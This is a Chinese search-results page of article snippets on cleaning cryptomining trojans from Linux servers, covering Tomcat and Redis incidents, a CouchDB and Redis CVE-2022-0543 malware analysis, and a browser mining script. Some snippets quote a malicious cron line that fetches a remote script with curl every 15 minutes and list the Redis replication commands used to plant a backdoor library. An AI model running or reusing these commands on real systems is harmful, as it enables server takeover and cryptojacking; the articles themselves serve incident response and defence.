首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

服务器植入挖矿木马cpu飙升解决

排查过程 我以 150+ 的手速立即打开了服务器,看到 Tomcat 挂了,然后顺其自然的重启,启动过程中直接 killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。...这是谁运行的程序?不管三七二十一先杀掉再说,因为它就是 Tomcat 等程序启动不了的元凶。 然而并没有什么卵用,过一会再看那个东西又跑出来占 CPU。怀疑是个定时任务: ? 什么鬼,是个图片?...启动 Tomcat 等程序,大功告成!...等等,这远远不够,考虑到能拿去挖矿的前提下你的服务器都已经被黑客入侵了,修复漏洞才对,不然你杀掉进程删掉文件后,黑客后门进来 history 一敲,都知道你做了啥修复手段。...遇到挖矿木马最好的解决方式:将主机镜像、找出病毒木马、分析入侵原因、检查业务程序、重装系统、修复漏洞、再重新部署系统。

2.1K10

记一次腾讯的云服务器植入挖矿程序的历程

不幸中的三生有幸…在19年9.10教师节的晚上,在我购买的云服务器上发现了这个挖矿程序…略有点刺激…故事是这样的~ #最近写了一个小程序,在购买的乞丐版腾讯云服务器上跑起来了tomcat、redis...//www.virustotal.com/ #妥妥的有问题… 开始干掉他… (1)杀进程 kill -9 PID号 (2)删文件 rm -rf sysupdate 此时报错 是因为该程序使用了...crontab或 rm -rf /etc/cron.d/*;(大小一般为182) b)查看并杀掉病毒进程:同时杀掉sysguard、networkservice、sysupdate三个进程; d)重启服务器...**配置好redis.conf中的bind,绑定本机以及允许访问的机器,否则你的服务器的redis会立即暴露在全球的眼皮底下,秒秒钟会被其他人或是运行的程序扫描到并且立即植入挖矿程序,你的服务器就成为别人的肉鸡了

12410
您找到你想要的搜索结果了吗?
是的
没有找到

Linux服务器植入木马挖矿该怎么处理解决

很多客户网站服务器入侵,攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站篡改,跳转,首页内容替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,有的客户使用的是阿里云服务器,经常被提醒服务器挖矿程序...,安全的处理时间也需要尽快的处理,根据我们的处理经验,我们总结了一些服务器攻击,被黑的排查办法,专门用来检查服务器第一时间的安全问题,看发生在哪里,服务器是否被黑,是否攻击,那些篡改等等。...如何排查服务器攻击?...对服务器的启动项进行检查,有些服务器植入木马后门,即使重启服务器也还是攻击,木马会自动的启动,检查linux的init.d的文件夹里是否有多余的启动文件,也可以检查时间,来判断启动项是否有问题。...最重要的是检查服务器的定时任务,前段时间某网站客户中了挖矿病毒,一直占用CPU,查看了定时任务发现每15分钟自动执行下载命令,crontab -l */15 * * * * (curl -fsSL https

5.6K30

记一次服务器植入挖矿木马CPU飙升200%解决过程

线上服务器用的是某讯云的,欢快的完美运行着 Tomcat,MySQL,MongoDB,ActiveMQ 等程序。突然一则噩耗从前线传来:网站不能访问了。...此项目是我负责,我以 150+ 的手速立即打开了服务器,看到 Tomcat 挂了,然后顺其自然的重启,启动过程中直接 killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果,机智的我打了个...好尴尬,但是心思细腻的我早知道没这么简单,肯定只是伪装,crul 过去是下面的脚本,过程就是在挖矿: #!...等等,这远远不够,考虑到能拿去挖矿的前提下你的服务器都已经被黑客入侵了,修复漏洞才对,不然你杀掉进程删掉文件后,黑客后门进来 history 一敲,都知道你做了啥修复手段。...检查业务程序,重装系统,修复漏洞,再重新部署系统。 写在最后, 网友提供的一劳永逸终极解决办法: 把你自己的挖矿脚本挂上去运行,这样别人就算挂脚本也跑不起来了,互相伤害啊

1.8K20

记一次服务器植入挖矿木马CPU飙升200%解决过程!

来源 | 个人博客 | 作者 | liugh_develop 线上服务器用的是某讯云的,欢快的完美运行着Tomcat,MySQL,MongoDB,ActiveMQ等程序。...此项目是我负责,我以150+的手速立即打开了服务器,看到Tomcat挂了,然后顺其自然的重启,启动过程中直接killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。...启动Tomcat等程序,大功告成!...等等,这远远不够,考虑到能拿去挖矿的前提下你的服务器都已经被黑客入侵了,修复漏洞才对,不然你杀掉进程删掉文件后,黑客后门进来history一敲,都知道你做了啥修复手段。...写在最后 网友提供的一劳永逸终极解决办法: 把你自己的挖矿脚本挂上去运行,这样别人就算挂脚本也跑不起来了。

1.3K20

原荐记一次服务器植入挖矿木马cpu飙升200%解决过程

线上服务器用的是某讯云的,欢快的完美运行着Tomcat,MySQL,MongoDB,ActiveMQ等程序。突然一则噩耗从前线传来:网站不能访问了。...此项目是我负责,我以150+的手速立即打开了服务器,看到Tomcat挂了,然后顺其自然的重启,启动过程中直接killed,再试试数据库,同样没成功,多次尝试甚至重启机器无果。...好尴尬,但是心思细腻的我早知道没这么简单,肯定只是伪装,crul过去是下面的脚本,过程就是在挖矿: #!...等等,这远远不够,考虑到能拿去挖矿的前提下你的服务器都已经被黑客入侵了,修复漏洞才对,不然你杀掉进程删掉文件后,黑客后门进来history一敲,都知道你做了啥修复手段。...检查业务程序。重装系统。修复漏洞。再重新部署系统。 写在最后,网友提供的一劳永逸终极解决办法: 把你自己的挖矿脚本挂上去运行,这样别人就算挂脚本也跑不起来了。

1.5K40

Redis服务器植入后门

研究人员称之为Redigo的一种基于Go的新的恶意软件,它一直针对有CVE-2022-0543漏洞的Redis服务器植入一个隐秘的后门允许命令执行。...今天,AquaSec报告说,其易受CVE-2022-0543影响的Redis蜜罐捕获了一个新的恶意软件,该恶意软件并没有Virus Total上的安全软件检测到。...找到目标端点后,atacker连接并运行以下命令: INFO - 检查Redis的版本,以确定服务器是否有CVE-2022-0543的漏洞。 SLAVEOF - 创建一个攻击服务器的副本。...REPLCONF - 配置从攻击服务器到新创建副本的连接。 PSYNC - 启动复制流并下载服务器磁盘上的共享库 "exp_lin.so"。...SLAVEOF NO ONE - 将有漏洞的Redis服务器转变成主服务器。 利用植入后门的命令执行能力,攻击者收集主机的硬件信息,然后下载Redigo(redis-1.2-SNAPSHOT)。

1K20

linux服务器植入ddgs、qW3xT.2挖矿病毒的处理实战记录

前言 随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一。...病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升高,风扇噪声增大等问题。...本文主要介绍的是关于linux植入ddgs、qW3xT.2挖矿病毒的处理方法,下面话不多说了,来一起看看详细的介绍吧 入侵后的现象: 发现有qW3xT.2与ddgs两个异常进程,消耗了较高的cpu,kill...2.清除/root/.ssh/authorized_keys 中黑客设置的免密登录内容 3.修改redis密码 4.修改root与登录账户密码 安全建议: 1.配置bind选项,限定可以连接Redis服务器的...这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度 3.如果可以在防火墙中屏蔽redis外网 入侵方式: 收集了相关资料,了解到其是利用redis漏洞,未设置密码或密码太简单,导致的入侵

78910

Couchdb权限绕过和任意命令执行植入挖矿程序入侵分析

dbappsecurity.com.cn 有偿投稿,记得留下你的姓名和联系方式哦~ 事件概述 我们捕获了利用Couchdb权限绕过漏洞的攻击行为,攻击者通过创建管理员帐户,之后利用Couchdb任意命令执行漏洞执行下载恶意脚本,植入挖矿恶意程序...应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。...8220下载一个配置文件1.json 并重命名,下载了rig、rig1、rig2三个样本并重命名,赋予了可执行权限,然后获取了受害主机的cpu核数,把配置文件内容和cpu核数作为参数执行suppoie这个程序...根据配置文件内容判断这是一个门罗币的挖矿样本,使用的是XMRig开源程序,查了一下这个钱包地址帐户因僵尸网络活动报告而暂停。 ?

1K30

揭秘:黑客利用Couchdb数据库中漏洞植入挖矿程序

事件概述 我们捕获了利用Couchdb权限绕过漏洞的攻击行为,攻击者通过创建管理员帐户,之后利用Couchdb任意命令执行漏洞执行下载恶意脚本,植入挖矿恶意程序。...应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。...8220下载一个配置文件1.json 并重命名,下载了rig、rig1、rig2三个样本并重命名,赋予了可执行权限,然后获取了受害主机的cpu核数,把配置文件内容和cpu核数作为参数执行suppoie这个程序...根据配置文件内容判断这是一个门罗币的挖矿样本,使用的是XMRig开源程序,查了一下这个钱包地址帐户因僵尸网络活动报告而暂停。 ?

74150

服务器挖矿木马攻击该怎么处理

,以及ecshop getshell漏洞,phpcms缓存写入漏洞来进行攻击网站,通过网站权限来提权拿到服务器管理员权限,利用其中一台服务器作为中转,来给其他服务器下达命令,执行攻击脚本,注入挖矿木马,...关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器挖矿木马攻击的时候可以应急处理,让损失降到最低。 ?...挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门...攻击者最初使用的是thinkphp5的漏洞来攻击网站,然后通过网站的权限来拿到服务器的root权限,挖矿的基本都是linux centos服务器,然后置入到linux系统里木马进程,并将58.65.125.98IP...针对服务器挖矿木马攻击的处理及安全解决方案 尽快的升级thinkphp系统的版本,检测网站源代码里是否留有攻击者留下的木马后门,对网站开启硬件防火墙,随时的检测攻击,使用其他网站开源系统的运营者,建议尽快升级网站系统到最新版本

4.1K20

服务器挖矿木马攻击该怎么处理

,以及ecshop getshell漏洞,phpcms缓存写入漏洞来进行攻击网站,通过网站权限来提权拿到服务器管理员权限,利用其中一台服务器作为中转,来给其他服务器下达命令,执行攻击脚本,注入挖矿木马,...关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器挖矿木马攻击的时候可以应急处理,让损失降到最低。...挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门...攻击者最初使用的是thinkphp5的漏洞来攻击网站,然后通过网站的权限来拿到服务器的root权限,挖矿的基本都是linux centos服务器,然后置入到linux系统里木马进程,并将58.65.125.98IP...针对服务器挖矿木马攻击的处理及安全解决方案 尽快的升级thinkphp系统的版本,检测网站源代码里是否留有攻击者留下的木马后门,对网站开启硬件防火墙,随时的检测攻击,使用其他网站开源系统的运营者,建议尽快升级网站系统到最新版本

2.9K10

服务器挖矿了的解决办法

网站服务器如果挖矿木马团伙攻陷,正常业务服务的性能将遭受严重影响,挖矿木马会被感染,也代表着网站服务器权限hack攻陷,公司的机密信息可能会泄露,攻击者也可能同时彻底破坏数据。 ?...面临更加严峻的安全挑战,公司应增加对服务器安全的重视度和建设力度。挖矿木马作为现阶段服务器面临的最普遍的危害之一,是检测企业安全防御机制、环境和技术能力水平的试金石。...如何有效应对这种安全危害,在此过程中促进公司网络安全能力的提高,必须变成企业安全管理者和网络安全厂商的共同目标,快过年了,挖矿木马植入服务器越来越多,导致很多网站或APP无法正常运行,如果想要彻底解决的话建议到服务器安全公司来处理解决...Linux网站服务器SSH、WindowsSQLServer等服务器访问入口设置高强度的登录密码,Redis、HadoopYarn、Docker、XXL-JOB、Postgres等应用程序增加许可证,控制访问对象...、恶意程序时,立即检查和修复网站服务器存在的系统漏洞、弱密码、网络应用漏洞。

3.4K10

话题讨论 | 关于网页植入挖矿代码的探讨

最近上网浏览网页的时候发现电脑CPU有升高,但是也在 70%以下,以为是后台运行一些更新程序什么的,结果没想到抓包一看是挖矿脚本! 数据包如下: ?...v=1”这个JS文件其实是一个挖矿脚本,来源于一个在线挖矿网站ppoi.org ,类似于著名的coinhive,与之前暴力简单的嵌在正常网页中的挖矿JS相比,作者设置了setThrottle ,线程应保持空闲的时间百分比...由referer头可以看出是由99e3.com这个域名跳转来的,目前推测有两种情况:该域名被黑,嵌入跳转的JS 脚本;或者该域名和上面跳转的域名newscdn.ysw365.com为同一个作者,其作用仅仅是用作执行挖矿脚本的诱饵...这与挖矿网站的二级域名一致,可以得出结论:网站作者利用诱饵网站进行钓鱼,采用诱惑性内容诱导用户点击相关资讯,从而调用挖矿脚本为作者牟利。 ?...newscdn.ysw365.com的Whois信息阿里云隐私保护,无法追溯,99e3.com的 Whois信息如下: ?

1.6K90

处理服务器恶意程序 kthreaddi挖矿

再次经历了服务器中恶意程序,一开始是ssh 服务器连接不上没反应,索性直接重启了服务器 这才能连接上服务器得终端 这台服务器之前运行着nexus私服 同事突然跟我说连接不上nexus了 我通过网页访问...web界面确实看不到nexus页面 登录服务器之后查看并没有nexus得端口存在,尝试进行启动nexus 一开始都是后台运行 ..../nexus run 看到了运行到中间得时候 程序就突然kill了 这个时候我直接就查看了主机得运行资源 #查看运行内存 free -h #查看硬盘内存 df -h #查看CPU使用率 top...从上top图可以看出有一个名为kthreaddi得进程一直跑满了CPU,所以会导致了最开始登录不上服务器程序运行不久会被kill。...-9 程序pid 他会重新生成新的程序继续跑慢你的cpu 根据之前得处理恶意程序得经验 我看一下计划性任务 如上看到了一个任务是在nexus文件夹下得东西 rm -rf ......

86620

处理服务器恶意程序 kthreaddi挖矿

再次经历了服务器中恶意程序,一开始是ssh 服务器连接不上没反应,索性直接重启了服务器 这才能连接上服务器得终端 这台服务器之前运行着nexus私服 同事突然跟我说连接不上nexus了 我通过网页访问...web界面确实看不到nexus页面 登录服务器之后查看并没有nexus得端口存在,尝试进行启动nexus 一开始都是后台运行 ..../nexus run 看到了运行到中间得时候 程序就突然kill了 这个时候我直接就查看了主机得运行资源 #查看运行内存 free -h #查看硬盘内存 df -h #查看CPU使用率 top...从上top图可以看出有一个名为kthreaddi得进程一直跑满了CPU,所以会导致了最开始登录不上服务器程序运行不久会被kill。...-9 程序pid 他会重新生成新的程序继续跑慢你的cpu 根据之前得处理恶意程序得经验 我看一下计划性任务 如上看到了一个任务是在nexus文件夹下得东西 rm -rf ......

93910

处理服务器恶意程序 kthreaddi挖矿

再次经历了服务器中恶意程序,一开始是ssh 服务器连接不上没反应,索性直接重启了服务器 这才能连接上服务器得终端 这台服务器之前运行着nexus私服 同事突然跟我说连接不上nexus了 我通过网页访问...web界面确实看不到nexus页面 登录服务器之后查看并没有nexus得端口存在,尝试进行启动nexus 一开始都是后台运行 ..../nexus run 看到了运行到中间得时候 程序就突然kill了 这个时候我直接就查看了主机得运行资源 #查看运行内存 free -h #查看硬盘内存 df -h #查看CPU使用率 top ?...从上top图可以看出有一个名为kthreaddi得进程一直跑满了CPU,所以会导致了最开始登录不上服务器程序运行不久会被kill。...-9 程序pid 他会重新生成新的程序继续跑慢你的cpu 根据之前得处理恶意程序得经验 我看一下计划性任务 ?

2.3K30
领券